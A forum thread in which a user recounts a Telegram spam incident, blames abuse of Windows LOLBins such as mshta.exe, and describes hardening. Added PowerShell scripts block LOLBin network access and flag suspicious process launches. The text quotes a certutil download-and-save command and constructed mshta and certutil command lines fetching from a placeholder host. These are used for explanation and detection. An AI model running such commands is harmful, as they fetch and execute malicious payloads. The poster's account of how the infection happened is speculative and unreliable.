Telegram Attack!


  • Telegram Attack!

    The other day, something happened that rarely happens to me.
    Suddenly I received 200 or more messages with the same content on Telegram, some screenshot with an advertisement, supposedly Elon Musk is offering something for free, like "hurry up before it's too late and while supplies last"... trollala.
    To make matters worse, most of my contacts in the list also received the same message from me?! Even though I didn't send anything to anyone!?
    I immediately suspected some virus, adware or some similar malicious software.
    I decided to do a detailed inspection of the problem.
    Let me say right away that none of the aggressively advertised anti-virus programs FOUND ANYTHING CONTROVERSIALLY BAD IN THE SYSTEM!?
    Hmmm... this is starting to intrigue me more and more and "peess" me off more and more.
    And then everything started to unravel and after ten hours I discovered everything.
    First: Telegram was heavily attacked by some hackers that day.
    I will not go into details; my assumption is that it is a strictly political matter and I would prefer to wash my hands of it. I am not interested in such things.
    Second, the attack "opened the door" and abused all the known (and more unknown, unpublished) vulnerabilities of the Windows system.
    And the most banal but also the most fatal thing that can happen to the system happened.
    With "very well protected systems" the biggest vulnerability is in "trivial details" that no one suspects.
    LOLBINs = Legitimate Windows tools (like powershell.exe) abused by hackers to do bad things (download malware, run code, evade detection).
    Key points:
    Built-in Windows programs, not viruses.
    Hard to block because they're trusted by the system.
    Example abuse: certutil.exe -urlcache -f <malicious_url> payload.exe
    In particular, a very trivial and benign file "mshta.exe" that exists in two folders in the system: System32 and SysWow... was attacked and infected in my system.
    mshta.exe is a legitimate Microsoft tool for running .hta (HTML Application) files.
    Abused as a LOLBin to execute malicious scripts (JavaScript/VBScript) directly from command line or URLs, often evading application whitelists.
    What does this have to do with the attack on Telegram? I wouldn't know. But the processes happened simultaneously and in the same period.
    Treating that file is pointless. Windows protects it very well even while the system is active; you can't do anything to it and that file does damage unhindered.
    One of the solutions (not 100% sure) is to remove the hard disk and connect it to another computer as "external media" and then you can manipulate those LOLBINS files, delete, replace, etc.
    However, I'm not sure (nobody is) to what extent the system is compromised and how deeply the problem has gone into the system.
    So, as always, I resorted to Solomon's solution, I formatted the drive, wiped everything and installed a new system. Fortunately, I do regular backups, so there was no damage.
    I completely removed Telegram from the system and I don't use it anymore (maybe that was the goal of the hacker), it will be on ice for some time at my place, until I hear that Telegram is safe again.
    But how to protect yourself from such nonsense in the future?
    Very simple! I don't know why they didn't do it in MS in the first place.
    First I created a list of all LOLBINS on the system. And then I created a separate inbound rule for each of them, each with specific criteria, depending on the purpose and nature of the file.
    But LOLBIN abuse is a consequence of already achieved code execution. The Telegram attack was the trigger.
    Therefore, I had to take additional measures:
    AppLocker / Windows Defender Application Control = allow only known/signed applications.
    EDR (Endpoint Detection & Response) = detect anomalies in process behavior.
    Restrictive GPOs = disable scripting for regular users.
    Network segmentation = limit the communication of critical systems... and this is the crucial part.
    And in the end, there remains one very simple solution: after system reinstallation, you simply stop using the application that is currently in trouble and that introduced the problem to the system.
    With most software of a different nature this can be a problem; why would I give up using Corel, for example?
    But with the type of software such as messengers, this is not a problem.
    There are "a million" of them. They are all more or less the same.
    You give up one and accept the other. But you restrict it well so that it cannot do anything in the system.
    I believe that my solution will not be ideal for many, but it is for me. The reason for this is the specific use of the computer and the system on it. "Preferences" is the right word.



    Last edited by ivconic; 01-29-2026, 05:18 PM.
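The rule-per-binary hardening described in the post above, written out as an added example (this is not the poster's own script and not a Microsoft-supplied one). The rules here are outbound: the abuse the post names, certutil fetching a payload or mshta running a script from a URL, needs an outgoing connection, so denying the binary network access is the part a firewall can actually do. The binary list, the rule naming scheme and the choice to leave powershell.exe out are assumptions to tune per machine; `New-NetFirewallRule`, `Get-NetFirewallRule` and `Get-NetFirewallApplicationFilter` are the standard NetSecurity cmdlets (Windows 8 / Server 2012 and later) and need an elevated shell.

```powershell
# Added example, not code from the post or from Microsoft.
# Creates one outbound block rule per LOLBin, covering both copies the post
# mentions: the 64-bit one in System32 and the 32-bit one in SysWOW64.
# Run from an elevated PowerShell (NetSecurity module, Windows 8+/2012+).

# Starting list (assumption; extend or trim for your own system).
# powershell.exe is deliberately left out: cutting its network access breaks
# legitimate administration (Install-Module, remoting), so constrain it with
# AppLocker/WDAC or Constrained Language Mode instead of a blanket block.
$LolBinNames = @(
    'mshta.exe', 'certutil.exe', 'regsvr32.exe', 'rundll32.exe',
    'bitsadmin.exe', 'wscript.exe', 'cscript.exe'
)

function Get-LolBinPaths {
    # Return every copy of each name that actually exists on this machine.
    param([string[]]$Names = $LolBinNames)
    $dirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
    foreach ($name in $Names) {
        foreach ($dir in $dirs) {
            $path = Join-Path $dir $name
            if (Test-Path -LiteralPath $path -PathType Leaf) { $path }
        }
    }
}

function New-LolBinBlockRules {
    # One "block outbound" rule per binary; safe to re-run (existing rules are skipped).
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$Paths = (Get-LolBinPaths))
    foreach ($path in $Paths) {
        $arch    = if ($path -like '*\SysWOW64\*') { 'x86' } else { 'x64' }
        $display = "LOLBin block outbound - $([IO.Path]::GetFileName($path)) ($arch)"
        if (Get-NetFirewallRule -DisplayName $display -ErrorAction SilentlyContinue) {
            Write-Verbose "Rule already present: $display"
            continue
        }
        if ($PSCmdlet.ShouldProcess($path, 'Create outbound block rule')) {
            New-NetFirewallRule -DisplayName $display `
                -Description 'Deny network access to a living-off-the-land binary' `
                -Direction Outbound -Program $path -Action Block `
                -Profile Any -Enabled True | Out-Null
        }
    }
}

function Get-LolBinBlockRules {
    # Verification step: list the rules this script manages and the program each targets.
    Get-NetFirewallRule -DisplayName 'LOLBin block outbound - *' | ForEach-Object {
        $filter = $_ | Get-NetFirewallApplicationFilter
        [pscustomobject]@{
            Rule    = $_.DisplayName
            Program = $filter.Program
            Enabled = $_.Enabled
            Action  = $_.Action
        }
    }
}

# Dry run first (-WhatIf prints what would be created), then apply and verify.
New-LolBinBlockRules -WhatIf
New-LolBinBlockRules
Get-LolBinBlockRules | Format-Table -AutoSize
```

Block rules win over allow rules in Windows Firewall, so these take effect even though the default outbound action is Allow. Expect some breakage to surface when you do this: msiexec.exe and bitsadmin.exe in particular are used by legitimate installers and Windows Update, which is why msiexec is not in the list and bitsadmin should be watched after the rule goes in.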
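The post's "EDR = detect anomalies in process behavior" point, made concrete as an added example that is not from the post or any vendor: a few detection rules run over process-creation records with the fields Sysmon Event ID 1 or an EDR would supply (image, parent image, command line). The records below are constructed for the example; the parent process name `SomeMessenger.exe`, the `example.invalid` hostname and the list of "expected" parent processes are placeholders and assumptions, and the certutil pattern is the one quoted in the post.

```powershell
# Added example, not code from the post. Flags LOLBin launches that look like
# the abuse described in the thread. The sample events are constructed.

$LolBins = @('mshta.exe', 'certutil.exe', 'regsvr32.exe', 'rundll32.exe',
             'wscript.exe', 'cscript.exe', 'bitsadmin.exe')

# Parents that normally start these binaries (assumption; tune from a baseline).
$ExpectedParents = @('explorer.exe', 'cmd.exe', 'services.exe', 'svchost.exe',
                     'msiexec.exe', 'powershell.exe')

function Find-LolBinAbuse {
    # Returns one finding per suspicious event, with every reason that fired.
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $image = [IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        if ($LolBins -notcontains $image) { continue }      # only LOLBins are of interest
        $parent  = [IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()
        $cmd     = [string]$e.CommandLine
        $reasons = @()

        # Any LOLBin handed a URL is worth a look; mshta and certutil especially.
        if ($cmd -match 'https?://') { $reasons += 'URL on the command line' }

        # The download-to-file pattern quoted in the post: certutil -urlcache -f <url> <file>
        if ($image -eq 'certutil.exe' -and $cmd -match '-urlcache' -and $cmd -match '(^|\s)-f(\s|$)') {
            $reasons += 'certutil download-to-file pattern'
        }

        # An .hta launched from a user-writable location rather than an install directory.
        if ($image -eq 'mshta.exe' -and $cmd -match '\\(Temp|Downloads|AppData)\\.*\.hta') {
            $reasons += 'HTA launched from user-writable path'
        }

        # LOLBin started by something other than the usual parents (e.g. a chat client or browser).
        if ($ExpectedParents -notcontains $parent) { $reasons += "unusual parent: $parent" }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $image
                Parent      = $parent
                CommandLine = $cmd
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample: two benign launches, three that should be flagged.
$SampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Users\u\AppData\Local\SomeMessenger\SomeMessenger.exe'   # placeholder parent
                       CommandLine = 'mshta.exe https://example.invalid/update.hta' },
    [pscustomobject]@{ Image = 'C:\Windows\SysWOW64\certutil.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'certutil.exe -urlcache -f https://example.invalid/p payload.exe' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'mshta.exe C:\Users\u\AppData\Local\Temp\inv.hta' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'certutil.exe -verify C:\certs\server.cer' },          # benign
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Program Files\Vendor\help.hta"' }                 # benign
)

Find-LolBinAbuse -Events $SampleEvents | Format-List
```

The same function works on real data once you map your source's field names onto `Image`, `ParentImage` and `CommandLine` (Sysmon Event ID 1 uses exactly those names). The parent-process rule is the noisiest of the four and the one that needs a baseline from your own machine before it is trusted; the URL and certutil rules rarely fire on legitimate use.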

  • #2
    that is?
    [image attachment]



    • #3
      Originally posted by ivconic (the opening post, quoted in full)



      Thanks for the info IVCONIC, yes I got that message...on Telegram...and I deleted the account the message came from...
      Let's see how it goes...
